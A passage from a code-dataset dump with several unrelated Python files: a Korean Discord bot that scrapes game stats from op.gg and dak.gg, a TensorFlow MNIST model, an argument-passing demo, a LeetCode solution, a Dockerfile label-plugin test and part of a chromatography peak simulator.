embed.add_field(name='아래파란버튼을 누르면 dak.gg에 들어가집니다.', value='[dak.gg들어가기](https://www.dak.gg/)', inline=False)\r\n\r\n await client.send_message(channel, embed=embed)\r\n\r\n\r\n\r\n if message.content.startswith(\"!롤\"):\r\n\r\n learn = message.content.split(\" \")\r\n\r\n location = learn[1]\r\n\r\n enc_location = urllib.parse.quote(location)\r\n\r\n url = \"http://www.op.gg/summoner/userName=\" + enc_location\r\n\r\n html = urllib.request.urlopen(url)\r\n\r\n bsObj = bs4.BeautifulSoup(html, \"html.parser\")\r\n\r\n rank1 = bsObj.find(\"div\", {\"class\": \"TierRankInfo\"})\r\n\r\n rank2 = rank1.find(\"div\", {\"class\": \"TierRank\"})\r\n\r\n rank3 = rank2.find(\"span\", {\"class\": \"tierRank\"})\r\n\r\n rank4 = rank3.text # 티어표시 (브론즈1,2,3,4,5 등등)\r\n\r\n print(rank4)\r\n\r\n if rank4 != 'Unranked':\r\n jumsu1 = rank1.find(\"div\", {\"class\": \"TierInfo\"})\r\n\r\n jumsu2 = jumsu1.find(\"span\", {\"class\": \"LeaguePoints\"})\r\n\r\n jumsu3 = jumsu2.text\r\n\r\n jumsu4 = jumsu3.strip() # 점수표시 (11LP등등)\r\n\r\n print(jumsu4)\r\n\r\n winlose1 = jumsu1.find(\"span\", {\"class\": \"WinLose\"})\r\n\r\n winlose2 = winlose1.find(\"span\", {\"class\": \"wins\"})\r\n\r\n winlose2_1 = winlose1.find(\"span\", {\"class\": \"losses\"})\r\n\r\n winlose2_2 = winlose1.find(\"span\", {\"class\": \"winratio\"})\r\n\r\n winlose2txt = winlose2.text\r\n\r\n winlose2_1txt = winlose2_1.text\r\n\r\n winlose2_2txt = winlose2_2.text # 승,패,승률 나타냄 200W 150L Win Ratio 55% 등등\r\n\r\n print(winlose2txt + \" \" + winlose2_1txt + \" \" + winlose2_2txt)\r\n\r\n channel = message.channel\r\n\r\n embed = discord.Embed(\r\n\r\n title='롤 정보',\r\n\r\n description='롤 정보입니다.',\r\n\r\n colour=discord.Colour.purple()\r\n\r\n )\r\n\r\n if rank4 == 'Unranked':\r\n\r\n embed.add_field(name='당신의 티어', value=rank4, inline=False)\r\n\r\n embed.add_field(name='-당신은 언랭-', value=\"언랭은 더이상의 정보는 제공하지 않습니다.\", inline=False)\r\n\r\n await client.send_message(channel, embed=embed)\r\n\r\n\r\n\r\n else:\r\n\r\n embed.add_field(name='당신의 티어', value=rank4, inline=False)\r\n\r\n embed.add_field(name='당신의 LP(점수)', value=jumsu4, inline=False)\r\n\r\n embed.add_field(name='당신의 승,패 정보', value=winlose2txt + \" \" + winlose2_1txt, inline=False)\r\n\r\n embed.add_field(name='당신의 승률', value=winlose2_2txt, inline=False)\r\n\r\n await client.send_message(channel, embed=embed)\r\n\r\n\r\n\r\n if message.content.startswith(\"!배그솔로\"):\r\n\r\n learn = message.content.split(\" \")\r\n\r\n location = learn[1]\r\n\r\n enc_location = urllib.parse.quote(location)\r\n\r\n url = \"https://dak.gg/profile/\" + enc_location\r\n\r\n html = urllib.request.urlopen(url)\r\n\r\n bsObj = bs4.BeautifulSoup(html, \"html.parser\")\r\n\r\n solo1 = bsObj.find(\"div\", {\"class\": \"overview\"})\r\n\r\n solo2 = solo1.text\r\n\r\n solo3 = solo2.strip()\r\n\r\n channel = message.channel\r\n\r\n embed = discord.Embed(\r\n\r\n title='배그솔로 정보',\r\n\r\n description='배그솔로 정보입니다.',\r\n\r\n colour=discord.Colour.purple())\r\n\r\n if solo3 == \"No record\":\r\n\r\n print(\"솔로 경기가 없습니다.\")\r\n\r\n embed.add_field(name='배그를 한판이라도 해주세요', value='솔로 경기 전적이 없습니다..', inline=False)\r\n\r\n await client.send_message(channel, embed=embed)\r\n\r\n\r\n\r\n\r\n\r\n else:\r\n\r\n solo4 = solo1.find(\"span\", {\"class\": \"value\"})\r\n\r\n soloratting = solo4.text # -------솔로레이팅---------\r\n\r\n solorank0_1 = solo1.find(\"div\", {\"class\": \"grade-info\"})\r\n\r\n solorank0_2 = solorank0_1.text\r\n\r\n solorank = solorank0_2.strip() # -------랭크(그마,브론즈)---------\r\n\r\n print(\"레이팅 : \" + 
soloratting)\r\n\r\n print(\"등급 : \" + solorank)\r\n\r\n print(\"\")\r\n\r\n embed.add_field(name='레이팅', value=soloratting, inline=False)\r\n\r\n embed.add_field(name='등급', value=solorank, inline=False)\r\n\r\n soloKD1 = bsObj.find(\"div\", {\"class\": \"kd stats-item stats-top-graph\"})\r\n\r\n soloKD2 = soloKD1.find(\"p\", {\"class\": \"value\"})\r\n\r\n soloKD3 = soloKD2.text\r\n\r\n soloKD = soloKD3.strip() # -------킬뎃(2.0---------\r\n\r\n soloSky1 = soloKD1.find(\"span\", {\"class\": \"top\"})\r\n\r\n soloSky2 = soloSky1.text # -------상위10.24%---------\r\n\r\n print(\"킬뎃 : \" + soloKD)\r\n\r\n print(\"킬뎃상위 : \" + soloSky2)\r\n\r\n print(\"\")\r\n\r\n embed.add_field(name='킬뎃,킬뎃상위', value=soloKD + \" \" + soloSky2, inline=False)\r\n\r\n # embed.add_field(name='킬뎃상위', value=soloSky2, inline=False)\r\n\r\n soloWinRat1 = bsObj.find(\"div\", {\"class\": \"stats\"}) # 박스\r\n\r\n soloWinRat2 = soloWinRat1.find(\"div\", {\"class\": \"winratio stats-item stats-top-graph\"})\r\n\r\n soloWinRat3 = soloWinRat2.find(\"p\", {\"class\": \"value\"})\r\n\r\n soloWinRat = soloWinRat3.text.strip() # -------승률---------\r\n\r\n soloWinRatSky1 = soloWinRat2.find(\"span\", {\"class\": \"top\"})\r\n\r\n soloWinRatSky = soloWinRatSky1.text.strip() # -------상위?%---------\r\n\r\n print(\"승률 : \" + soloWinRat)\r\n\r\n print(\"승률상위 : \" + soloWinRatSky)\r\n\r\n print(\"\")\r\n\r\n embed.add_field(name='승률,승률상위', value=soloWinRat + \" \" + soloWinRatSky, inline=False)\r\n\r\n # embed.add_field(name='승률상위', value=soloWinRatSky, inline=False)\r\n\r\n soloHead1 = soloWinRat1.find(\"div\", {\"class\": \"headshots stats-item stats-top-graph\"})\r\n\r\n soloHead2 = soloHead1.find(\"p\", {\"class\": \"value\"})\r\n\r\n soloHead = soloHead2.text.strip() # -------헤드샷---------\r\n\r\n soloHeadSky1 = soloHead1.find(\"span\", {\"class\": \"top\"})\r\n\r\n soloHeadSky = soloHeadSky1.text.strip() # # -------상위?%---------\r\n\r\n print(\"헤드샷 : \" + soloHead)\r\n\r\n print(\"헤드샷상위 : \" + soloHeadSky)\r\n\r\n print(\"\")\r\n\r\n embed.add_field(name='헤드샷,헤드샷상위', value=soloHead + \" \" + soloHeadSky, inline=False)\r\n\r\n # embed.add_field(name='헤드샷상위', value=soloHeadSky, inline=False)\r\n\r\n await client.send_message(channel, embed=embed)\r\n\r\n\r\n if message.content.startswith(\"!배그듀오\"):\r\n\r\n learn = message.content.split(\" \")\r\n\r\n location = learn[1]\r\n\r\n enc_location = urllib.parse.quote(location)\r\n\r\n url = \"https://dak.gg/profile/\" + enc_location\r\n\r\n html = urllib.request.urlopen(url)\r\n\r\n bsObj = bs4.BeautifulSoup(html, \"html.parser\")\r\n\r\n duoCenter1 = bsObj.find(\"section\", {\"class\": \"duo modeItem\"})\r\n\r\n duoRecord1 = duoCenter1.find(\"div\", {\"class\": \"overview\"})\r\n\r\n duoRecord = duoRecord1.text.strip() # ----기록이없습니다 문구----\r\n\r\n print(duoRecord)\r\n\r\n channel = message.channel\r\n\r\n embed = discord.Embed(\r\n\r\n title='배그듀오 정보',\r\n\r\n description='배그듀오 정보입니다.',\r\n\r\n colour=discord.Colour.purple())\r\n\r\n if duoRecord == 'No record':\r\n\r\n print('듀오 경기가 없습니다.')\r\n\r\n embed.add_field(name='배그를 한판이라도 해주세요', value='듀오 경기 전적이 없습니다..', inline=False)\r\n\r\n await client.send_message(channel, embed=embed)\r\n\r\n\r\n\r\n\r\n\r\n else:\r\n\r\n duoRat1 = duoRecord1.find(\"span\", {\"class\": \"value\"})\r\n\r\n duoRat = duoRat1.text.strip() # ----레이팅----\r\n\r\n duoRank1 = duoRecord1.find(\"p\", {\"class\": \"grade-name\"})\r\n\r\n duoRank = duoRank1.text.strip() # ----등급----\r\n\r\n print(duoRank)\r\n\r\n embed.add_field(name='레이팅', value=duoRat, 
inline=False)\r\n\r\n embed.add_field(name='등급', value=duoRank, inline=False)\r\n\r\n duoStat = duoCenter1.find(\"div\", {\"class\": \"stats\"})\r\n\r\n duoKD1 = duoStat.find(\"div\", {\"class\": \"kd stats-item stats-top-graph\"})\r\n\r\n duoKD2 = duoKD1.find(\"p\", {\"class\": \"value\"})\r\n\r\n duoKD = duoKD2.text.strip() # ----킬뎃----\r\n\r\n duoKdSky1 = duoStat.find(\"span\", {\"class\": \"top\"})\r\n\r\n duoKdSky = duoKdSky1.text.strip() # ----킬뎃 상위?%----\r\n\r\n print(duoKD)\r\n\r\n print(duoKdSky)\r\n\r\n embed.add_field(name='킬뎃,킬뎃상위', value=duoKD + \" \" + duoKdSky, inline=False)\r\n\r\n duoWinRat1 = duoStat.find(\"div\", {\"class\": \"winratio stats-item stats-top-graph\"})\r\n\r\n duoWinRat2 = duoWinRat1.find(\"p\", {\"class\": \"value\"})\r\n\r\n duoWinRat = duoWinRat2.text.strip() # ----승률----\r\n\r\n duoWinRatSky1 = duoWinRat1.find(\"span\", {\"class\": \"top\"})\r\n\r\n duoWinRatSky = duoWinRatSky1.text.strip() # ----승률 상위?%----\r\n\r\n print(duoWinRat)\r\n\r\n print(duoWinRatSky)\r\n\r\n embed.add_field(name='승률,승률상위', value=duoWinRat + \" \" + duoWinRatSky, inline=False)\r\n\r\n duoHead1 = duoStat.find(\"div\", {\"class\": \"headshots\"})\r\n\r\n duoHead2 = duoHead1.find(\"p\", {\"class\": \"value\"})\r\n\r\n duoHead = duoHead2.text.strip() # ----헤드샷----\r\n\r\n duoHeadSky1 = duoHead1.find(\"span\", {\"class\": \"top\"})\r\n\r\n duoHeadSky = duoHeadSky1.text.strip() # ----헤드샷 상위?%----\r\n\r\n print(duoHead)\r\n\r\n print(duoHeadSky)\r\n\r\n embed.add_field(name='헤드샷,헤드샷상위', value=duoHead + \" \" + duoHeadSky, inline=False)\r\n\r\n await client.send_message(channel, embed=embed)\r\n\r\n\r\n if message.content.startswith(\"!배그스쿼드\"):\r\n\r\n learn = message.content.split(\" \")\r\n\r\n location = learn[1]\r\n\r\n enc_location = urllib.parse.quote(location)\r\n\r\n url = \"https://dak.gg/profile/\" + enc_location\r\n\r\n html = urllib.request.urlopen(url)\r\n\r\n bsObj = bs4.BeautifulSoup(html, \"html.parser\")\r\n\r\n duoCenter1 = bsObj.find(\"section\", {\"class\": \"squad modeItem\"})\r\n\r\n duoRecord1 = duoCenter1.find(\"div\", {\"class\": \"overview\"})\r\n\r\n duoRecord = duoRecord1.text.strip() # ----기록이없습니다 문구----\r\n\r\n print(duoRecord)\r\n\r\n channel = message.channel\r\n\r\n embed = discord.Embed(\r\n\r\n title='배그스쿼드 정보',\r\n\r\n description='배그스쿼드 정보입니다.',\r\n\r\n colour=discord.Colour.purple())\r\n\r\n if duoRecord == 'No record':\r\n\r\n print('스쿼드 경기가 없습니다.')\r\n\r\n embed.add_field(name='배그를 한판이라도 해주세요', value='스쿼드 경기 전적이 없습니다..', inline=False)\r\n\r\n await client.send_message(channel, embed=embed)\r\n\r\n\r\n\r\n else:\r\n\r\n duoRat1 = duoRecord1.find(\"span\", {\"class\": \"value\"})\r\n\r\n duoRat = duoRat1.text.strip() # ----레이팅----\r\n\r\n duoRank1 = duoRecord1.find(\"p\", {\"class\": \"grade-name\"})\r\n\r\n duoRank = duoRank1.text.strip() # ----등급----\r\n\r\n print(duoRank)\r\n\r\n embed.add_field(name='레이팅', value=duoRat, inline=False)\r\n\r\n embed.add_field(name='등급', value=duoRank, inline=False)\r\n\r\n duoStat = duoCenter1.find(\"div\", {\"class\": \"stats\"})\r\n\r\n duoKD1 = duoStat.find(\"div\", {\"class\": \"kd stats-item stats-top-graph\"})\r\n\r\n duoKD2 = duoKD1.find(\"p\", {\"class\": \"value\"})\r\n\r\n duoKD = duoKD2.text.strip() # ----킬뎃----\r\n\r\n duoKdSky1 = duoStat.find(\"span\", {\"class\": \"top\"})\r\n\r\n duoKdSky = duoKdSky1.text.strip() # ----킬뎃 상위?%----\r\n\r\n print(duoKD)\r\n\r\n print(duoKdSky)\r\n\r\n embed.add_field(name='킬뎃,킬뎃상위', value=duoKD + \" \" + duoKdSky, inline=False)\r\n\r\n duoWinRat1 = 
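The `!배그듀오` and `!배그스쿼드` handlers in this record are near-identical copies that differ only in the section class (`duo modeItem` vs `squad modeItem`) and the embed labels. A sketch of one parameterized dak.gg scraper covering both; the class names are taken from the record and may be stale, and the solo page reads a slightly different overview block (`grade-info`), so only the duo/squad shape is mirrored here:

```python
import urllib.parse
import urllib.request
import bs4

def battleground_stats(nickname, mode):  # mode is 'duo' or 'squad'
    url = 'https://dak.gg/profile/' + urllib.parse.quote(nickname)
    soup = bs4.BeautifulSoup(urllib.request.urlopen(url), 'html.parser')
    section = soup.find('section', {'class': '{} modeItem'.format(mode)})
    overview = section.find('div', {'class': 'overview'})
    if overview.text.strip() == 'No record':
        return None  # no games played in this mode

    stats = section.find('div', {'class': 'stats'})

    def stat(cls):
        box = stats.find('div', {'class': cls})
        return (box.find('p', {'class': 'value'}).text.strip(),
                box.find('span', {'class': 'top'}).text.strip())

    return {
        'rating': overview.find('span', {'class': 'value'}).text.strip(),
        'grade': overview.find('p', {'class': 'grade-name'}).text.strip(),
        'kd': stat('kd stats-item stats-top-graph'),
        'winratio': stat('winratio stats-item stats-top-graph'),
        'headshots': stat('headshots'),
    }
```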
duoStat.find(\"div\", {\"class\": \"winratio stats-item stats-top-graph\"})\r\n\r\n duoWinRat2 = duoWinRat1.find(\"p\", {\"class\": \"value\"})\r\n\r\n duoWinRat = duoWinRat2.text.strip() # ----승률----\r\n\r\n duoWinRatSky1 = duoWinRat1.find(\"span\", {\"class\": \"top\"})\r\n\r\n duoWinRatSky = duoWinRatSky1.text.strip() # ----승률 상위?%----\r\n\r\n print(duoWinRat)\r\n\r\n print(duoWinRatSky)\r\n\r\n embed.add_field(name='승률,승률상위', value=duoWinRat + \" \" + duoWinRatSky, inline=False)\r\n\r\n duoHead1 = duoStat.find(\"div\", {\"class\": \"headshots\"})\r\n\r\n duoHead2 = duoHead1.find(\"p\", {\"class\": \"value\"})\r\n\r\n duoHead = duoHead2.text.strip() # ----헤드샷----\r\n\r\n duoHeadSky1 = duoHead1.find(\"span\", {\"class\": \"top\"})\r\n\r\n duoHeadSky = duoHeadSky1.text.strip() # ----헤드샷 상위?%----\r\n\r\n print(duoHead)\r\n\r\n print(duoHeadSky)\r\n\r\n embed.add_field(name='헤드샷,헤드샷상위', value=duoHead + \" \" + duoHeadSky, inline=False)\r\n\r\n await client.send_message(channel, embed=embed)\r\n\r\naccess_tonken = os.environ[\"BOT_TOKEN\"] \r\nclient.run(access_token)\r\n","sub_path":"SAINC.py","file_name":"SAINC.py","file_ext":"py","file_size_in_byte":32492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"162264963","text":"import tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\n\nmnist = input_data.read_data_sets(\"MNIST_data/\", one_hot=True)\n\n\ndef filter_variable(shape):\n initial = tf.truncated_normal(shape, stddev=0.1)\n return tf.Variable(initial)\n\n\ndef bias_variable(shape):\n initial = tf.constant(0.1, shape=shape)\n return tf.Variable(initial)\n\n\ndef conv2d(x, w):\n return tf.nn.conv2d(x, w, strides=[1, 1, 1, 1], padding='SAME')\n\n\ndef max_pool_2_2(x):\n return tf.nn.max_pool(x, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')\n\n\nif __name__ == \"__main__\":\n import os\n os.environ['Tf_CPP-MIN-LOG-LEVEL'] = '2'\n\n x = tf.placeholder('float', shape=[None, 784])\n # 输入图像是由2维的浮点数tensor组成的,这里我们分配给它的形状是[None,784],\n # 其中784表示一个28x28像素点的MNIST图像单一展开的维度,\n # None表示第一个维度,与batch的大小有关,它可以是任意大小,即输入图像数量不唯一\n y = tf.placeholder('float', shape=[None, 10])\n\n f_conv1 = filter_variable([5, 5, 1, 32])\n b_conv1 = bias_variable([32])\n x_image = tf.reshape(x, [-1, 28, 28, 1]) # -1表示取出所有的数据\n\n h_conv1 = tf.nn.relu(conv2d(x_image, f_conv1)+b_conv1)\n h_pool1 = max_pool_2_2(h_conv1)\n\n f_conv2 = filter_variable([5, 5, 32, 64])\n b_conv2 = bias_variable([64])\n h_conv2 = tf.nn.relu(conv2d(h_pool1, f_conv2)+b_conv2)\n h_pool2 = max_pool_2_2(h_conv2)\n\n # 28 / 2 / 2\n w_fc1 = filter_variable([7*7*64, 1024])\n b_fc1 = bias_variable([1024])\n\n h_pool2_flat = tf.reshape(h_pool2, [-1, 7*7*64])\n h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, w_fc1)+b_fc1)\n\n keep_prob = tf.placeholder(tf.float32)\n h_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)\n\n w_fc2 = filter_variable([1024, 10])\n b_fc2 = bias_variable([10])\n\n y_conv = tf.nn.softmax(tf.matmul(h_fc1_drop, w_fc2)+b_fc2)\n\n cross_entropy = -tf.reduce_sum(y*tf.log(y_conv))\n train_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy)\n correction_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_conv, 1))\n accuracy = tf.reduce_mean(tf.cast(correction_prediction, 'float'))\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n for i in range(1000):\n batch = mnist.train.next_batch(50)\n if i % 100 == 0:\n train_accuracy = accuracy.eval(session=sess, feed_dict={\n x: batch[0], y: batch[1], keep_prob: 1.0})\n print(\"step 
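The bot's startup tail above assigns the environment token to `access_tonken` but then passes the undefined name `access_token` to `client.run()`, so the script dies with a `NameError` before it ever connects. A corrected tail, keeping the record's pre-1.0 `discord.py` client (`client.send_message` is the old API):

```python
import os
import discord

client = discord.Client()

# ... the event handlers from the record go here ...

access_token = os.environ["BOT_TOKEN"]  # was misspelled `access_tonken`
client.run(access_token)
```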
%d, accuracy %g\" % (i, train_accuracy))\n train_step.run(session=sess, feed_dict={x: batch[0], y: batch[1], keep_prob: 0.5})\n print(\"test accuracy %g\" % accuracy.eval(session=sess, feed_dict={\n x: mnist.test.images, y: mnist.test.labels, keep_prob: 1.0\n }))\n # 打印出测试集的结果\n","sub_path":"dl_tf/mnist.py","file_name":"mnist.py","file_ext":"py","file_size_in_byte":2886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"199859161","text":"# -*- coding: utf-8 -*-\n\ndef test_var_args(f_arg, *argv):\n print(\"first normal arg:\", f_arg)\n for arg in argv:\n print(\"anothor arg through *argv:\", arg)\n\n\ndef greet_me(**kwargs):\n for key, val in kwargs.items():\n print(\"{0} == {1}\".format(key, val))\n\n\ndef test_argv_kwargv(arg1, arg2, arg3):\n print(\"arg1:\", arg1)\n print(\"arg2:\", arg2)\n print(\"arg3:\", arg3)\n\n\nif __name__ == \"__main__\":\n test_var_args('a', 'b', 'c', 'd')\n test_var_args('a', ('b', 'c', 'd'))\n\n greet_me(name=\"a\")\n\n kw = {\"name\": \"a\", \"age\": 12}\n greet_me(**kw)\n\n args = ('aaa', 1, 2)\n test_argv_kwargv(*args)\n\n kwargs = {\"arg1\": 1, \"arg2\": \"v2\", \"arg3\" : \"v3\"}\n test_argv_kwargv(**kwargs)\n","sub_path":"basic/func_args.py","file_name":"func_args.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"465051174","text":"# 1054. Distant Barcodes\n\n# 2021/02/16\n# Runtime: 524 ms, faster than 31.97% of Python3 online submissions for Distant Barcodes.\n# Memory Usage: 16.9 MB, less than 10.49% of Python3 online submissions for Distant Barcodes.\n\n# 和 lc 767一模一样,贪心算法,技巧性很强\n\n\nclass Solution:\n def rearrangeBarcodes(self, barcodes: List[int]) -> List[int]:\n counts = {}\n for num in barcodes:\n counts[num] = counts.get(num, 0) + 1\n heap = [(-val, num) for num, val in counts.items()]\n heapq.heapify(heap)\n ans = []\n while len(heap) > 1:\n c1, n1 = heapq.heappop(heap)\n c2, n2 = heapq.heappop(heap)\n ans.extend([n1, n2])\n if c1 + 1:\n heapq.heappush(heap, (c1 + 1, n1))\n if c2 + 1:\n heapq.heappush(heap, (c2 + 1, n2))\n return ans + ( [ heap[0][1] ] if heap else [] )","sub_path":"1054. Distant Barcodes.py","file_name":"1054. Distant Barcodes.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"89097999","text":"\"\"\"\nCopyright (c) 2015 Red Hat, Inc\nAll rights reserved.\n\nThis software may be modified and distributed under the terms\nof the BSD license. 
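The Distant Barcodes record above (its Chinese comment notes it reuses the same greedy max-heap trick as LC 767) references `List` and `heapq` that LeetCode injects into submissions; as a standalone script it needs the imports. A self-contained version of the same idea:

```python
import heapq
from collections import Counter
from typing import List

def rearrange_barcodes(barcodes: List[int]) -> List[int]:
    heap = [(-count, num) for num, count in Counter(barcodes).items()]
    heapq.heapify(heap)
    ans = []
    while len(heap) > 1:
        c1, n1 = heapq.heappop(heap)  # most frequent remaining value
        c2, n2 = heapq.heappop(heap)  # second most frequent
        ans.extend([n1, n2])          # interleaving keeps equal values apart
        if c1 + 1:                    # counts are negative; +1 consumes one use
            heapq.heappush(heap, (c1 + 1, n1))
        if c2 + 1:
            heapq.heappush(heap, (c2 + 1, n2))
    return ans + ([heap[0][1]] if heap else [])

assert rearrange_barcodes([1, 1, 1, 2, 2, 2]) == [1, 2, 1, 2, 1, 2]
```

The MNIST record just before it also sets `os.environ['Tf_CPP-MIN-LOG-LEVEL']`, which silently does nothing; TensorFlow reads `TF_CPP_MIN_LOG_LEVEL`.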
See the LICENSE file for details.\n\"\"\"\n\nfrom __future__ import print_function\n\nimport os\ntry:\n from collections import OrderedDict\nexcept ImportError:\n # Python 2.6\n from ordereddict import OrderedDict\nfrom dock.core import DockerTasker\nfrom dock.inner import DockerBuildWorkflow\nfrom dock.plugin import PreBuildPluginsRunner\nfrom dock.plugins.pre_add_labels_in_df import AddLabelsPlugin\nfrom dock.util import ImageName\n\n\nclass X(object):\n image_id = \"xxx\"\n git_dockerfile_path = None\n git_path = None\n base_image = ImageName(repo=\"qwe\", tag=\"asd\")\n\n\ndef test_addlabels_plugin(tmpdir):\n df = \"\"\"\\\nFROM fedora\nRUN yum install -y python-django\nCMD blabla\"\"\"\n tmp_df = os.path.join(str(tmpdir), 'Dockerfile')\n with open(tmp_df, mode=\"w\") as fd:\n fd.write(df)\n\n tasker = DockerTasker()\n workflow = DockerBuildWorkflow(\"asd\", \"test-image\")\n setattr(workflow, 'builder', X)\n setattr(workflow.builder, 'df_path', tmp_df)\n\n labels_conf = OrderedDict({'label1': 'value 1', 'label2': 'long value'})\n\n runner = PreBuildPluginsRunner(\n tasker,\n workflow,\n [{\n 'name': AddLabelsPlugin.key,\n 'args': {'labels': labels_conf}\n }]\n )\n runner.run()\n assert AddLabelsPlugin.key is not None\n with open(tmp_df, 'r') as fd:\n altered_df = fd.read()\n # Can't be sure of the order of the labels, expect either\n expected_output = [r\"\"\"FROM fedora\nRUN yum install -y python-django\nLABEL \"label1\"=\"value 1\" \"label2\"=\"long value\"\nCMD blabla\"\"\",\n r\"\"\"FROM fedora\nRUN yum install -y python-django\nLABEL \"label2\"=\"long value\" \"label1\"=\"value 1\"\nCMD blabla\"\"\"]\n assert altered_df in expected_output\n","sub_path":"tests/plugins/test_add_labels.py","file_name":"test_add_labels.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"429068957","text":"import numpy as np\nimport pickle\nimport matplotlib.pyplot as plt\nfrom scipy.stats import norm, skewnorm\n\nclass PeakModel: \n @classmethod\n def peak(cls, maxcps, datapoints, dwelltime, skew = 0, sigma = 3, location = 0):\n location = 0\n scale = 1\n alpha = skew\n# delta = alpha / np.sqrt(1+alpha**2)\n# uz = np.sqrt(2/np.pi) * delta\n# sigmaz = np.sqrt(1.0-uz**2.0)\n# gamma = (4-np.pi)/2 * (delta*np.sqrt(2/np.pi))**3/(1-2*delta**2/np.pi)**(3/2)\n# moa = uz - (gamma * sigmaz / 2) - (np.sign(alpha))*np.exp(-2*np.pi/np.abs(alpha))\n# mode = location + scale * moa\n# _norm_ = skewnorm.pdf(x=mode, a=alpha, loc=location, scale=scale) # 標準正規分布の高さ\n\n times = np.linspace(-sigma, sigma, datapoints)\n _refpeak_ = skewnorm.pdf(x = times, a=alpha, loc=0, scale=scale)\n # _refpeak_ = [skewnorm.pdf(x = time, a=alpha, loc=0, scale=scale) for time in times]\n _norm_ = np.max(_refpeak_)\n maxindex = np.argmax(_refpeak_)\n maxtime = times[maxindex]\n # refpeak = np.array(_refpeak_) * maxcps / _norm_\n # refpeak = np.array([skewnorm.pdf(x=time, a=alpha, loc= location - maxtime, scale=scale) * maxcps / _norm_ for time in times])\n #refpeak = np.array(skewnorm.pdf(x=times, a=alpha, loc= location - maxtime, scale=scale) * maxcps / _norm_ )\n refpeak = skewnorm.pdf(x=times, a=alpha, loc= location - maxtime, scale=scale) * maxcps / _norm_ \n # print('maxindex:', maxindex)\n # print('maxpos:', maxtime)\n # samplepeak = np.array([np.random.poisson(peak * dwelltime / 1000) * 1000 / dwelltime for peak in refpeak])\n # return times, refpeak, samplepeak \n return refpeak\n @classmethod\n def simulate(cls, dwelltime, chrom):\n # 
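The dock test above asserts that `AddLabelsPlugin` injects a `LABEL` line into the Dockerfile, accepting either key order — necessarily so, because constructing `OrderedDict` from a dict literal on pre-3.7 CPython does not actually fix the order. A standalone sketch of the transformation the test expects; this is not dock's real implementation, which lives in `pre_add_labels_in_df`:

```python
def add_labels(dockerfile, labels):
    """Insert a LABEL instruction before the final CMD, as the test expects."""
    rendered = 'LABEL ' + ' '.join('"{0}"="{1}"'.format(k, v)
                                   for k, v in labels.items())
    lines = dockerfile.splitlines()
    for i in range(len(lines) - 1, -1, -1):
        if lines[i].startswith('CMD'):
            lines.insert(i, rendered)  # LABEL goes just above CMD
            break
    return '\n'.join(lines)

df = 'FROM fedora\nRUN yum install -y python-django\nCMD blabla'
print(add_labels(df, {'label1': 'value 1', 'label2': 'long value'}))
```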
simulated = np.array([np.random.poisson(chromdata * dwelltime / 1000) * 1000 / dwelltime for chromdata in chrom])\n simulated = np.random.poisson(chrom * dwelltime / 1000) * 1000 / dwelltime\n return simulated\n @classmethod\n def baseline(cls, level, datapoints, dwelltime):\n sample = np.array(np.random.poisson(level * dwelltime / 1000, datapoints) * 1000)\n # sample = np.array([np.random.poisson(level * dwelltime / 1000) * 1000 / dwelltime for i in np.arange(datapoints)])\n variation = np.max(sample) - np.min(sample)\n return sample, variation\n @classmethod\n def spikenoise(cls, datapoints):\n sample = np.array([np.random.poisson(1) for i in np.arange(datapoints)])\n # print(sample)\n return sample\n @classmethod\n def zscore(cls, x, axis = None):\n xmean = np.mean(x, axis=axis, dtype='float')\n xstd = np.std(x, axis=axis, keepdims=True)\n zscore = (x-xmean)/xstd\n return zscore\n @classmethod\n def normalize(cls, x, factor=None, axis=None):\n if factor:\n return x/factor, factor\n xmax = np.max(x, axis=axis)\n if xmax == 0:\n return x, 1\n normalized = x/xmax\n return normalized, xmax\n @classmethod\n def normalize_and_spike(cls, x, noise_rate=0.03, normalization_factor=None, axis=None):\n if normalization_factor:\n return x/normalization_factor, normalization_factor\n xmax = np.max(x, axis=axis)\n if xmax == 0:\n normalized = x\n xmax = 1\n else:\n normalized = x/xmax\n noise_count = int(len(normalized) * noise_rate)\n _id = np.arange(len(normalized))\n np.random.shuffle(_id)\n _id = _id[0:noise_count]\n normalized[_id] = 1\n return normalized, xmax\n\n @classmethod\n def chrom(cls, datapoints, dwelltime, min_peaknumber, max_peaknumber, peak_dynamicrange, min_peakwidth, max_peakwidth):\n baselinelevel = 10**(np.random.rand() * 3)\n peaknumber = np.random.randint(min_peaknumber, max_peaknumber + 1)\n # SNRs = [3 + np.random.rand() * (10 ** (peak_dynamicrange - 1)) for i in np.arange(peaknumber)]\n\n base, noiselevel = PeakModel.baseline(level= baselinelevel, datapoints= datapoints, dwelltime=dwelltime)\n\n if noiselevel < 100:\n noiselevel = 100\n\n Skews = [np.random.rand() * 5 for i in np.arange(peaknumber)]\n PeakHeights = [np.random.randint(noiselevel*3, noiselevel*(3+np.random.rand()*(10**(peak_dynamicrange-1)))+1) for i in np.arange(peaknumber)]\n PeakWidths = [np.random.randint(min_peakwidth, max_peakwidth + 1) for i in np.arange(peaknumber)]\n \n Peaks = [PeakModel.peak(maxcps = PeakHeights[i], datapoints = PeakWidths[i], dwelltime = dwelltime, skew=Skews[i]) for i in np.arange(peaknumber)]\n Positions = [np.random.randint(0, datapoints) for i in np.arange(peaknumber)]\n\n # ゼロレベルにピークを配置してピークだけのクロマトを作成\n RefChrom = np.zeros(datapoints) + baselinelevel\n NormalizedPeakPositions = np.zeros((peaknumber, 3)) # (start, end, class(=1))\n for i in np.arange(peaknumber):\n peak = Peaks[i]\n pos = Positions[i]\n width = PeakWidths[i]\n if width % 2 == 0: # 偶数\n startpos = int(pos - width/2)\n endpos = startpos + width\n else:\n startpos = int(pos - (width-1)/2)\n endpos = startpos + width\n 